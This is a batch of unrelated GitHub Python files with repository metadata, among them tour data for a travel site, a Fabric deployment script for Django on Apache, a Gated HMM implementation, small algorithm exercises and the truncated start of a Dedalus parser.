BeceJlka/Stepic_Project
9b6f84f7d42aa00e7e6872aa6e5945390a1362ff
7fdc15f2bb0c53140c8f0c13123c56a13da856ea
refs/heads/master
2021-07-12T18:07:33.961435
2020-03-10T18:22:47
2020-03-10T18:22:47
241,647,044
0
0
null
2021-03-20T03:00:21
2020-02-19T14:47:52
Python
UTF-8
Python
false
false
15,927
py
title = "Stepik Travel" subtitle = "Для тех, кого отвлекают дома" description = "Лучшие направления, где никто не будет вам мешать сидеть на берегу и изучать программирование, дизайн, разработку игр и управление продуктами" departures = {"msk": "Из Москвы", "spb": "Из Петербурга", "nsk": "Из Новосибирска", "ekb": "Из Екатеринбурга", "kazan": "Из Казани"} list_departures = ["Из Москвы", "Из Петербурга", "Из Новосибирска", "Из Екатеринбурга", "Из Казани"] tours = { 1: { "title": "Marina Lake Hotel & Spa", "description": "Отель выглядит уютно. Он был построен из красного соснового дерева и украшен синими камнями. Высокие округлые окна добавляют общий стиль дома и были добавлены в дом в довольно симметричном образце.", "departure": "nsk", "picture": "https://images.unsplash.com/photo-1551882547-ff40c63fe5fa?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 62000, "stars": "4", "country": "Куба", "nights": 6, "date": "2 марта", }, 2: { "title": "Baroque Hotel", "description": "Здание отеля имеет форму короткой буквы U. Два расширения связаны стеклянными нависающими панелями. Второй этаж такого же размера, как и первый, который был построен точно над полом под ним. Этот этаж имеет совершенно другой стиль, чем этаж ниже.", "departure": "ekb", "picture": "https://images.unsplash.com/photo-1445019980597-93fa8acb246c?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 85000, "stars": "5", "country": "Вьетнам", "nights": 8, "date": "12 января", }, 3: { "title": "Voyager Resort", "description": "Снаружи отель выглядит красиво и традиционно. Он был построен с белыми камнями и имеет еловые деревянные украшения. Высокие, большие окна добавляют к общему стилю дома и были добавлены в дом в основном симметричным способом.", "departure": "nsk", "picture": "https://images.unsplash.com/photo-1569660072562-48a035e65c30?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 63000, "stars": "3", "country": "Пакистан", "nights": 11, "date": "7 февраля", }, 4: { "title": "Orbit Hotel", "description": "Каждый домик оборудован средней кухней и одной небольшой ванной комнатой, в нем также есть уютная гостиная, две спальни, скромная столовая и большой подвал. Небольшие треугольные окна добавляют к общему стилю дома и были добавлены в дом в основном симметричным способом.", "departure": "msk", "picture": "https://images.unsplash.com/photo-1520250497591-112f2f40a3f4?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 62000, "stars": "4", "country": "Индия", "nights": 9, "date": "22 января", }, 5: { "title": "Atlantis Cabin Hotel", "description": "Этот дом среднего размера имеет футуристический вид и находится в среднем состоянии. Интерьер выполнен в насыщенных тонах. Двор небольшой и выглядит очень формально. Кроме того, странные огни были замечены движущимися в доме ночью.", "departure": "msk", "picture": "https://images.unsplash.com/photo-1566073771259-6a8506099945?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 68000, "stars": "4", "country": "Доминикана", "nights": 8, "date": "18 января", }, 6: { "title": "Light Renaissance Hotel", "description": "Этот крошечный дом выглядит довольно современно и находится в ужасном состоянии. Интерьер выполнен в цветах, которые напоминают вам о тропическом лесу. Двор небольшой и заросший дикими растениями. Кроме того, это было однажды показано в телесериале, демонстрирующем необычно украшенные дома.", "departure": "spb", "picture": "https://images.unsplash.com/photo-1571896349842-33c89424de2d?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 53000, "stars": "3", "country": "Пакистан", "nights": 13, "date": "15 февраля", }, 7: { "title": "King's Majesty Hotel", "description": "Этот дом средних размеров выглядит немного старомодно и находится в среднем состоянии. Интерьер выполнен в цветах, которые напоминают о весеннем цветнике. Двор среднего размера и напоминает луг. Кроме того, он был построен над остатками дома, который был разрушен в результате пожара.", "departure": "ekb", "picture": "https://images.unsplash.com/photo-1468824357306-a439d58ccb1c?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 72000, "stars": "5", "country": "Мексика", "nights": 9, "date": "22 января", }, 8: { "title": "Crown Hotel", "description": "Этот огромный дом почти выглядит инопланетянином и находится в среднем состоянии. Интерьер выполнен в цветах, напоминающих апельсиновое дерево. Двор среднего размера и напоминает луг. Кроме того, это место печально известного убийства.", "departure": "kazan", "picture": "https://images.unsplash.com/photo-1549109786-eb80da56e693?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 44000, "stars": "4", "country": "Тайланд", "nights": 7, "date": "3 февраля", }, 9: { "title": "Seascape Resort", "description": "Этот большой дом имеет сказочный вид и находится в отличном состоянии. Интерьер выполнен в ярких цветах. Двор маленький и аккуратно подстрижен. На заднем дворе есть большой участок недавно созданной земли, а дом имеет большой решетчатый забор через него. На заднем дворе живут различные животные. Многие владельцы приложили согласованные усилия для поддержания этой собственности.", "departure": "nsk", "picture": "https://images.unsplash.com/photo-1570214476695-19bd467e6f7a?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 39000, "stars": "3", "country": "Индия", "nights": 10, "date": "1 февраля", }, 10: { "title": "Rose Sanctum Hotel", "description": "Снаружи этот дом выглядит старым, но чудесным. Он был построен из желтого соснового дерева и украшен белым кирпичом. Короткие, широкие окна пропускают много света и были добавлены в дом очень симметричным способом.", "departure": "msk", "picture": "https://images.unsplash.com/photo-1560200353-ce0a76b1d438?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 52000, "stars": "4", "country": "Куба", "nights": 10, "date": "30 января", }, 11: { "title": "Viridian Obelisk Hotel & Spa", "description": "В доме очень хороший двор с большими камнями, похожими на озеро. В задней части дома окна просторные, с большими окнами, они светлее, чтобы улучшить впечатление. Снаружи есть пять маленьких деревьев. Двор в очень хорошем состоянии и очень живописный. Есть пруд для развлечения", "departure": "spb", "picture": "https://images.unsplash.com/photo-1477120128765-a0528148fed2?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 68000, "stars": "5", "country": "Индия", "nights": 9, "date": "1 марта", }, 12: { "title": "Saffron Tundra Hotel & Spa", "description": "Дом оборудован огромной кухней и одной современной ванной комнатой, а также имеет огромную гостиную, две спальни, небольшую столовую, гостиную и скромную кладовую. Дом чистый, хорошо построенный и в хорошем состоянии, но, к сожалению, кровати сгорели в мае этого года и, к сожалению, все еще нуждаются в ремонте. Возможно, понадобится целая команда, чтобы заменить старую медную топку.", "departure": "kazan", "picture": "https://images.unsplash.com/photo-1440151050977-247552660a3b?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 72000, "stars": "4", "country": "Мексика", "nights": 12, "date": "17 февраля", }, 13: { "title": "Traveller Resort", "description": "Снаружи этот дом выглядит очень элегантно. Он был построен из коричневого кирпича и имеет коричневые кирпичные украшения. Высокие, большие окна добавляют к общему стилю дома и были добавлены к дому в довольно асимметричном образце. Крыша высокая и наклонена в одну сторону и покрыта коричневой черепицей. Один большой дымоход высовывает центр крыши. На крыше нет окон. Сам дом окружен великолепным садом с виноградными лозами, пагодой, прудом и множеством разных цветов.", "departure": "ekb", "picture": "https://images.unsplash.com/photo-1553653924-39b70295f8da?ixlib=rb-1.2.1&auto=format&fit=crop&w=800&q=60", "price": 49000, "stars": "3", "country": "Куба", "nights": 8, "date": "26 января" }, 14: { "title": "History Hotel & Spa", "description": "Крыша высокая, треугольная, многослойная, покрыта пшеничной соломой. Две большие трубы находятся по обе стороны от дома. Многие меньшие окна пропускают много света в комнаты под крышей.Сам дом окружен асфальтированной землей, с местом для еды и отдыха на открытом воздухе и различными горшечными растениями.", "departure": "kazan", "picture": "https://images.unsplash.com/photo-1509600110300-21b9d5fedeb7?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 91000, "stars": "5", "country": "Вьетнам", "nights": 9, "date": "3 февраля", }, 15: { "title": "Riverside Lagoon Hotel & Spa", "description": "Здание имеет форму круга. Дом частично окружен деревянными нависающими панелями с двух сторон. Второй этаж меньше первого, что позволило создать несколько балконов по бокам дома. Этот этаж следует тому же стилю, что и этаж ниже.", "departure": "spb", "picture": "https://images.unsplash.com/photo-1568084680786-a84f91d1153c?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 82000, "stars": "4", "country": "Доминикана", "nights": 8, "date": "5 февраля", }, 16: { "title": "History Hotel & Spa", "description": "Это высокое здание из старого кирпича. Крыша высокая, треугольная, многослойная, покрыта пшеничной соломой. В тесной квадратной спальне установлена деревянная и стеклянная мебель. Пол деревянный, а стены текстурированы и окрашены.Настенные и напольные светильники обеспечивают свет. Комната оформлена в цветах, напоминающих облачное небо, и в целом выглядит очень старомодно. Первое, что вы заметите, это тщеславие.", "departure": "spb", "picture": "https://images.unsplash.com/photo-1564056095795-4d63b6463dbf?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=800&q=60", "price": 74000, "stars": "5", "country": "Вьетнам", "nights": 12, "date": "24 января", } }
55dfdc90e02123686986cc1acf673b300872d8e1
b2c3feb259d8cfefe64938aa029958c50387a4ec
/distributed/server.py
c8312838d2085883135141b19fb7c53a17b91623
[]
no_license
alexflint/tensorflow-experiments
0a7a5d73571bdf111ce37b4e9711df213e9d354e
3a95d0a869ddc9d6309bb8d6f5b06d3347748d0c
refs/heads/master
2023-07-07T01:43:06.937158
2018-08-12T19:17:03
2018-08-12T19:17:03
140,112,767
0
0
null
null
null
null
UTF-8
Python
false
false
106
py
import tensorflow as tf server = tf.train.Server.create_local_server() print(server.target) server.join()
e23633a5a9b66be7ed21624a319c2ac19699c898
81a1c5db1f24a7daf4fe51de499e1aea81d8ea05
/fabfile.py
94155b79ffeb1d48061ee035c7bbca818b7c3f36
[]
no_license
Beomi/azure-django-test
cf0d1fe323a63d9ba2672b8ebea2fc3e170980ce
a811afb62501f2fe245226f9bb94cd51bebc6866
refs/heads/master
2021-06-19T15:53:18.932591
2017-06-08T12:20:34
2017-06-08T12:20:34
null
0
0
null
null
null
null
UTF-8
Python
true
false
6,241
py
from fabric.contrib.files import append, exists, sed, put from fabric.api import env, local, run, sudo import random import os import json PROJECT_DIR = os.path.dirname(os.path.abspath(__file__)) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # deploy.json파일을 불러와 envs변수에 저장합니다. with open(os.path.join(PROJECT_DIR, "deploy.json")) as f: envs = json.loads(f.read()) # TODO: Required Fields: REPO_URL, PROJECT_NAME, REMOTE_HOST, REMOTE_PASSWORD, REMOTE_USER, REMOTE_HOST_SSH @ deploy.json # developer: chagne this! REPO_URL = envs['REPO_URL'] PROJECT_NAME = envs['PROJECT_NAME'] REMOTE_HOST_SSH = envs['REMOTE_HOST_SSH'] REMOTE_HOST = envs['REMOTE_HOST'] REMOTE_USER = envs['REMOTE_USER'] REMOTE_PASSWORD = envs['REMOTE_PASSWORD'] STATIC_ROOT_NAME = 'static_deploy' STATIC_URL_NAME = 'static' MEDIA_ROOT = 'uploads' # TODO: Server Engineer: you should add env.user as sudo user and NOT be root env.user = REMOTE_USER username = env.user # Option: env.password env.hosts = [ REMOTE_HOST_SSH, ] env.password = REMOTE_PASSWORD project_folder = '/home/{}/{}'.format(env.user, PROJECT_NAME) apt_requirements = [ 'ufw', 'curl', 'git', 'python3-dev', 'python3-pip', 'build-essential', 'python3-setuptools', 'apache2', 'libapache2-mod-wsgi-py3', 'libmysqlclient-dev', 'libssl-dev', 'libxml2-dev', 'libjpeg8-dev', 'zlib1g-dev', ] def new_server(): setup() deploy() def setup(): _get_latest_apt() _install_apt_requirements(apt_requirements) _make_virtualenv() #_ufw_allow() def deploy(): _get_latest_source() _put_envs() _update_settings() _update_virtualenv() _update_static_files() _update_database() #_ufw_allow() _make_virtualhost() _grant_apache2() _grant_sqlite3() _restart_apache2() def _put_envs(): put(os.path.join(PROJECT_DIR, 'envs.json'), '~/{}/envs.json'.format(PROJECT_NAME)) def _get_latest_apt(): update_or_not = input('would you update?: [y/n]') if update_or_not=='y': sudo('sudo apt-get update && sudo apt-get -y upgrade') def _install_apt_requirements(apt_requirements): reqs = '' for req in apt_requirements: reqs += (' ' + req) sudo('sudo apt-get -y install {}'.format(reqs)) def _make_virtualenv(): if not exists('~/.virtualenvs'): script = '''"# python virtualenv settings export WORKON_HOME=~/.virtualenvs export VIRTUALENVWRAPPER_PYTHON="$(command \which python3)" # location of python3 source /usr/local/bin/virtualenvwrapper.sh"''' run('mkdir ~/.virtualenvs') sudo('sudo pip3 install virtualenv virtualenvwrapper') run('echo {} >> ~/.bashrc'.format(script)) def _get_latest_source(): if exists(project_folder + '/.git'): run('cd %s && git fetch' % (project_folder,)) else: run('git clone %s %s' % (REPO_URL, project_folder)) current_commit = local("git log -n 1 --format=%H", capture=True) run('cd %s && git reset --hard %s' % (project_folder, current_commit)) def _update_settings(): settings_path = project_folder + '/{}/settings.py'.format(PROJECT_NAME) sed(settings_path, "DEBUG = True", "DEBUG = False") sed(settings_path, 'ALLOWED_HOSTS = .+$', 'ALLOWED_HOSTS = ["%s"]' % (REMOTE_HOST,) ) secret_key_file = project_folder + '/{}/secret_key.py'.format(PROJECT_NAME) if not exists(secret_key_file): chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)' key = ''.join(random.SystemRandom().choice(chars) for _ in range(50)) append(secret_key_file, "SECRET_KEY = '%s'" % (key,)) append(settings_path, '\nfrom .secret_key import SECRET_KEY') def _update_virtualenv(): virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME) if not exists(virtualenv_folder + '/bin/pip'): run('cd /home/%s/.virtualenvs && virtualenv %s' % (env.user, PROJECT_NAME)) run('%s/bin/pip install -r %s/requirements.txt' % ( virtualenv_folder, project_folder )) def _update_static_files(): virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME) run('cd %s && %s/bin/python3 manage.py collectstatic --noinput' % ( project_folder, virtualenv_folder )) def _update_database(): virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME) run('cd %s && %s/bin/python3 manage.py migrate --noinput' % ( project_folder, virtualenv_folder )) def _ufw_allow(): sudo("ufw allow 'Apache Full'") sudo("ufw reload") def _make_virtualhost(): script = """'<VirtualHost *:80> ServerName {servername} Alias /{static_url} /home/{username}/{project_name}/{static_root} Alias /{media_url} /home/{username}/{project_name}/{media_url} <Directory /home/{username}/{project_name}/{media_url}> Require all granted </Directory> <Directory /home/{username}/{project_name}/{static_root}> Require all granted </Directory> <Directory /home/{username}/{project_name}/{project_name}> <Files wsgi.py> Require all granted </Files> </Directory> WSGIDaemonProcess {project_name} python-home=/home/{username}/.virtualenvs/{project_name} python-path=/home/{username}/{project_name} WSGIProcessGroup {project_name} WSGIScriptAlias / /home/{username}/{project_name}/{project_name}/wsgi.py ErrorLog ${{APACHE_LOG_DIR}}/error.log CustomLog ${{APACHE_LOG_DIR}}/access.log combined </VirtualHost>'""".format( static_root=STATIC_ROOT_NAME, username=env.user, project_name=PROJECT_NAME, static_url=STATIC_URL_NAME, servername=REMOTE_HOST, media_url=MEDIA_ROOT ) sudo('echo {} > /etc/apache2/sites-available/{}.conf'.format(script, PROJECT_NAME)) sudo('a2ensite {}.conf'.format(PROJECT_NAME)) def _grant_apache2(): sudo('sudo chown -R :www-data ~/{}'.format(PROJECT_NAME)) def _grant_sqlite3(): sudo('sudo chmod 775 ~/{}/db.sqlite3'.format(PROJECT_NAME)) def _restart_apache2(): sudo('sudo service apache2 restart')
22aa2617e351bbbaf035cb3b8ac08016c4632660
41278a3ab6c8b8f280e785b79c15377a2de56a2d
/guardian.py
680dbcc6516d80fb29ac29c6bda4d43391c6e140
[]
no_license
mayanand/restClient
1f0c70aad91d15c1a8d7f53bdc5c5c89ab6e5db8
927cffc1f2374760633da4bf6555801a80983469
refs/heads/master
2021-03-08T19:25:38.925946
2016-04-14T00:04:46
2016-04-14T00:04:46
56,193,486
5
0
null
null
null
null
UTF-8
Python
false
false
721
py
#!/usr/bin/env python from restapi import restAPI from image import imageDownloader class guardianRestAPI(restAPI): def __init__(self): restAPI.__init__(self) self.RESTendpoint = "http://content.guardianapis.com/search?q=%s&api-key=%s" self.apiKey = 'test' def parseGuradianJSON(self, topic): result = self.connect_api(topic) imageDownloader_obj = imageDownloader() for element in result['response']['results']: imageDownloader_obj.get_images(element['webUrl']) #pprint.pprint(result) if __name__ == '__main__': g_obj = guardianRestAPI() g_obj.parseGuradianJSON('obama')
[ "Mayank Anand" ]
Mayank Anand
6d5e991fc2b55c73e9b32da5c9d0db6a146186b2
a22054032f23d84f34741532aaca5fe46e23a552
/run_app_dev.py
6fae0d484a2796685d1401726f30707b1548e9fc
[]
no_license
BearChao/transfer
622003bfb0b2b7c8da6287a65764c69ad81f3d9c
4159a596d0f5c728f6ce27568beb21c2ba321846
refs/heads/master
2021-05-23T06:08:01.183541
2018-05-28T14:39:30
2018-05-28T14:39:30
94,799,123
0
0
null
null
null
null
UTF-8
Python
false
false
209
py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import os from app import create_app app = create_app(os.getenv('FLASK_CONFIG') or 'default') if __name__ == '__main__': app.run(host='0.0.0.0',debug=True)
9152ac03f49d6c145510fb642b234cac13c0b135
23e0f2433ae89295766a24d8d87626d18af6e84c
/problems/abc179_a.py
78c1867f75ae21403e67d3de6f63c06edac7d487
[]
no_license
chokoryu/atcoder
0d7ec486177e45abee847acde38d31d35c61df42
e0c0920a7a4d8a90fd6fb3cab7ab1e97a95b9084
refs/heads/master
2023-02-06T12:06:09.562394
2020-12-29T02:42:54
2020-12-29T02:42:54
283,260,970
0
0
null
null
null
null
UTF-8
Python
false
false
460
py
from fractions import gcd from collections import Counter, deque, defaultdict from heapq import heappush, heappop, heappushpop, heapify, heapreplace, merge from bisect import bisect_left, bisect_right, bisect, insort_left, insort_right, insort from itertools import accumulate, product, permutations, combinations def main(): S = input() if S[-1] == 's': print(S + 'es') else: print(S + 's') if __name__ == '__main__': main()
7d75a5e69d0aeff702d6fe53686e32f47cd01b4e
f1614f3531701a29a33d90c31ab9dd6211c60c6b
/test/menu_sun_integration/handlers/test_status_synchronizer_service.py
207c451856241312424ce76fdbb72a3f98062b7d
[]
no_license
pfpacheco/menu-sun-api
8a1e11543b65db91d606b2f3098847e3cc5f2092
9bf2885f219b8f75d39e26fd61bebcaddcd2528b
refs/heads/master
2022-12-29T13:59:11.644409
2020-10-16T03:41:54
2020-10-16T03:41:54
304,511,679
0
0
null
null
null
null
UTF-8
Python
false
false
3,110
py
import json import os import responses import pytest from menu_sun_api.domain.model.customer.customer import Customer from menu_sun_api.domain.model.order.order import OrderStatusType from menu_sun_api.domain.model.order.order_repository import OrderRepository from menu_sun_api.domain.model.seller.seller import IntegrationType from menu_sun_integration.application.services.order_integration_service import OrderIntegrationService from promax.application.status_synchronizer_service import StatusSynchronizerService from test.menu_sun_api.db.order_factory import OrderFactory, OrderStatusFactory from test.menu_sun_api.db.seller_factory import SellerFactory from test.menu_sun_api.integration_test import IntegrationTest here = os.path.dirname(os.path.realpath(__file__)) def bind_seller(integration_type): return SellerFactory.create(seller_code='0810204', integration_type=integration_type) class TestStatusNotifierService(IntegrationTest): @pytest.fixture def active_responses(self): json_file = open( os.path.join( here, '../../menu_sun_integration/infrastructure/ambev/promax_response/authenticate_user_response.json')) response = json.load(json_file) responses.add(responses.POST, 'https://{}/ambev/security/ldap/authenticateUser'.format(os.getenv("PROMAX_IP")), json=response, status=200) return responses @responses.activate def test_fetch_order_status_promax(self, session, active_responses): seller = bind_seller(IntegrationType.PROMAX) session.commit() customer = Customer(document="17252508000180", seller_id=seller.id) statuses = [OrderStatusFactory(status=OrderStatusType.NEW), OrderStatusFactory(status=OrderStatusType.APPROVED)] order = OrderFactory.create(seller_id=seller.id, order_id='M2100008658', customer=customer, statuses=statuses) session.commit() json_file = open( os.path.join( here, '../../menu_sun_integration/infrastructure/ambev/promax_response/orders_history_response.json')) response = json.load(json_file) active_responses.add(responses.POST, 'https://{}/ambev/genericRestEndpoint'.format(os.getenv("PROMAX_IP")), json=response, status=200) order_repository = OrderRepository(session=session) integration_service = OrderIntegrationService(session=session) status_notification = StatusSynchronizerService(order_repository=order_repository, integration_service=integration_service) status_notification.sync_all_pending_orders( seller_id=seller.id, seller_code=seller.seller_code, integration_type=seller.integration_type) session.commit() order = order_repository.get_order( seller_id=seller.id, order_id=order.order_id) assert (order.status.status == OrderStatusType.CANCELED)
faf55dcced2172399d37e25d66e39d89868333d0
280049c5d363df840e5a2184002e59625f0af61b
/datastructure11-balancedparanthesischeck.py
26c752c9dfffff64c23a2cf8d5095ae37812d617
[]
no_license
deesaw/DataSPython
853c1b36f7185752613d6038e706b06fbf25c84e
c69a23dff3b3852310f145d1051f2ad1dda6b7b5
refs/heads/main
2023-02-19T13:36:01.547293
2021-01-16T13:15:56
2021-01-16T13:15:56
330,166,053
0
0
null
null
null
null
UTF-8
Python
false
false
1,346
py
# -*- coding: utf-8 -*- """ Created on Wed Jan 6 12:17:58 2021 @author: deesaw """ def balance_check(s): # Check is even number of brackets if len(s)%2 != 0: return False # Set of opening brackets opening = set('([{') # Matching Pairs matches = set([ ('(',')'), ('[',']'), ('{','}') ]) # Use a list as a "Stack" stack = [] # Check every parenthesis in string for paren in s: # If its an opening, append it to list if paren in opening: stack.append(paren) else: # Check that there are parentheses in Stack if len(stack) == 0: return False # Check the last open parenthesis last_open = stack.pop() # Check if it has a closing match if (last_open,paren) not in matches: return False return len(stack) == 0 from nose.tools import assert_equal class TestBalanceCheck(object): def test(self,sol): assert_equal(sol('[](){([[[]]])}('),False) assert_equal(sol('[{{{(())}}}]((()))'),True) assert_equal(sol('[[[]])]'),False) print('ALL TEST CASES PASSED') # Run Tests t = TestBalanceCheck() t.test(balance_check)
49d3fe6b4ad2a62850cc09fd55ce4e235e09ecce
71d304e88e996e695451be82cfb24029b4b2b9dd
/ghmm.py
98589df3885a5307a587e450b86b7e4dd1c99f84
[]
no_license
negar7918/GHMMs
7875ab232e36b05febac74c3261aca811a08d77a
ea75d0f3bd82c0e2e046d34debff4fd352637819
refs/heads/master
2021-07-20T13:34:37.444101
2020-06-09T17:53:39
2020-06-09T17:53:39
177,122,775
0
0
null
null
null
null
UTF-8
Python
false
false
5,871
py
# This is the implementation of the new method in the below paper published at AIME 2019: # "Gated Hidden Markov Models for Early Prediction of Outcome of Internet-based Cognitive Behavioral Therapy" # This implementation is intended for sequences up to length 150 and for longer ones, one should use log probabilities. # This implementation was used for binary states in HMM and EM needs only 10 iterations (this fact is published already) # In case of having more states, one should implement the convergence criteria properly. # Value -1 is used to represent a missing observation or data point; here we handle missing values without imputation. import numpy as np def forward(params, observations, label=None): pi, A, O = params N = len(observations) S = pi.shape[0] alpha = np.zeros((N, S)) # base case if observations[0] != -1: alpha[0, :] = pi * O[:, observations[0]] # handling missing else: alpha[0, :] = pi # recursive case for i in range(1, N): for s2 in range(S): for s1 in range(S): transition = A[s1, s2] # supervised part if i == N - 1 and label is not None: if label == s2: transition = 1 else: transition = 0 if observations[i] != -1: alpha[i, s2] += alpha[i - 1, s1] * transition * O[s2, observations[i]] # handling missing else: alpha[i, s2] += alpha[i - 1, s1] * transition return alpha, np.sum(alpha[N - 1, :]) def backward(params, observations): pi, A, O = params N = len(observations) S = pi.shape[0] beta = np.zeros((N, S)) # base case beta[N - 1, :] = 1 # recursive case for i in range(N - 2, -1, -1): for s1 in range(S): for s2 in range(S): if observations[i + 1] != -1: beta[i, s1] += beta[i + 1, s2] * A[s1, s2] * O[s2, observations[i + 1]] # handling missings else: beta[i, s1] += beta[i + 1, s2] * A[s1, s2] return beta, np.sum(pi * O[:, observations[0]] * beta[0, :]) # this is a modified version of Baum_Welch # threshold: is intended to compare with the fractional change # policy: contains the begin and end indexes needed to calculate the fractional change e.g [[0, 9], [-10, -1]] # label: is the hidden state of the GHMM which needs regulation by gate mechanism # labels for the training data are expected to be at the end of each sequence in the training data def ghmm(training, pi, A, O, iterations, threshold, policy, label): pi, A, O = np.copy(pi), np.copy(A), np.copy(O) S = pi.shape[0] begin = policy[0] end = policy[1] # do several steps of EM hill climbing for it in range(iterations): pi1 = np.zeros_like(pi) A1 = np.zeros_like(A) O1 = np.zeros_like(O) for observations in training: obs = observations[:-1] # compute forward-backward matrices alpha, za = forward((pi, A, O), obs, observations[-1]) # observations[-1] is the label of the sequence beta, zb = backward((pi, A, O), obs) # calculate sums at the desired indexes in the sequence for fractional change sum_begin = np.sum(obs[begin[0]:begin[1]]) + obs[begin[0]:begin[1]].count(-1) sum_end = np.sum(obs[end[0]:end[1]]) + obs[end[0]:end[1]].count(-1) fractional_change = (abs(sum_begin - sum_end)) / sum_begin # M-step here, calculating the frequency of starting state, transitions and (state, obs) pairs pi1 += alpha[0, :] * beta[0, :] / za for i in range(0, len(obs)): # handling missings if obs[i] != -1: O1[:, obs[i]] += alpha[i, :] * beta[i, :] / za for i in range(1, len(obs)): for s1 in range(S): for s2 in range(S): trans = A[s1, s2] # gate mechanism: affect the update by considering fractional_change if s2 == label and fractional_change < threshold: trans = 0 if obs[i] != -1: A1[s1, s2] += alpha[i - 1, s1] * trans * O[s2, obs[i]] * beta[i, s2] / za else: A1[s1, s2] += alpha[i - 1, s1] * trans * beta[i, s2] / za # normalise pi1, A1, O1 pi = pi1 / np.sum(pi1) for s in range(S): A[s, :] = A1[s, :] / np.sum(A1[s, :]) O[s, :] = O1[s, :] / np.sum(O1[s, :]) return pi, A, O # quick test a = np.array([[0.6, 0.4], [0.4, 0.6]]) p = np.array([0.7, 0.3]) o = np.array([[0.7, 0.1, 0.2, 0, 0, 0], [0, 0., 0.3, .4, .2, .1]]) label_0, label_1 = 0, 1 # the first two sequences have fractional change higher than threshold and the other two lower data = [[4, 4, 3, 2, -1, -1, 3, 4, 1, 1, 0, label_0], [4, 3, 3, -1, 3, -1, 3, -1, 1, 1, 1, label_0], [5, 5, 5, 3, 4, -1, -1, -1, 4, 5, 4, label_1], [4, 5, -1, 3, 4, 5, -1, -1, -1, 5, 3, label_1]] start_prob, transition_prob, emission_prob = ghmm(data, p, a, o, 10, threshold=.51, policy=[[0, 2], [-2, -1]], label=label_0) print(start_prob) print(transition_prob) print(emission_prob) print('\n') # do perdiction for a new sequence without having label sequence = [5, 4, -1, 4, 4, 5, -1, -1, -1, 5, 4] fwd, s = forward((start_prob, transition_prob, emission_prob), sequence) prob = fwd[len(sequence) - 1, 1] / s print("prediction probability: {}".format(prob)) print("predicted label: {}".format(1 if prob > .5 else 0))
e6f8f51a840280d413cfe95488d13ed729fe6b2e
3c2bb35d04a2dd44e16366c6e52eb74ecf8ba87b
/linearsearch.py
27f9b69282c90729ee8439a664c1be6609b2dad0
[]
no_license
Brijesh-Pandey/Python-Programs-For-Noobs
7c871ebf01ce5f9e4cfa53b100b8f1b569f72a5d
1d7187986a26d3f7ebcf3699017ab242dd16b482
refs/heads/main
2023-08-18T01:46:22.533629
2021-10-09T20:06:30
2021-10-21T01:37:49
301,089,699
6
11
null
2021-05-18T09:27:14
2020-10-04T09:32:23
Python
UTF-8
Python
false
false
247
py
z=int(input("Enter element to be searched ")) li=[int(x) for x in input().split()] for i in range(len(li)): if li[i]==z: flag=1 break else: flag=0 if flag==1: print("Found at position ",+i+1 ) else: print("Not found") input()
e2165c7579217230237b68c6b491e3e20486e06b
c4ea97ae471cd222378684b8dc6be1047836dc85
/src/dedt/dedalusParser.py
9ba5de3d8b1778559ec87925a329aaff254cb7aa
[ "MIT" ]
permissive
KDahlgren/iapyx
b3de26da34ffd7dcc255afd9b70fe58de543711b
260a265f79cd66bf4ea72b0a4837517d460dc257
refs/heads/master
2018-10-01T06:45:15.986558
2018-06-22T01:38:22
2018-06-22T01:38:22
109,737,208
0
1
null
null
null
null
UTF-8
Python
false
false
26,697
py
#!/usr/bin/env python ''' dedalusParser.py Define the functionality for parsing Dedalus files. ''' import inspect, logging, os, re, string, sys, traceback from pyparsing import * import ConfigParser # ------------------------------------------------------ # # import sibling packages HERE!!! if not os.path.abspath( __file__ + "/../.." ) in sys.path : sys.path.append( os.path.abspath( __file__ + "/../.." ) ) from utils import tools # ------------------------------------------------------ # ############# # GLOBALS # ############# eqnOps = [ "==", "!=", ">=", "<=", ">", "<" ] opList = eqnOps + [ "+", "-", "/", "*" ] aggOps = [ "min", "max", "sum", "count", "avg" ] ################## # CLEAN RESULT # ################## # input pyparse object of the form ([...], {...}) # output only [...] def cleanResult( result ) : newResult = [] numParsedStrings = len(result) for i in range(0, numParsedStrings) : newResult.append( result[i] ) return newResult ########### # PARSE # ########### # input a ded line # output parsed line # fact returns : [ 'fact', { relationName:'relationNameStr', dataList:[ data1, ... , dataN ], factTimeArg:<anInteger> } ] # rule returns : [ 'rule', # { relationName : 'relationNameStr', # goalAttList:[ data1, ... , dataN ], # goalTimeArg : ""/next/async, # subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr', # subgoalAttList : [ data1, ... , dataN ], # polarity : 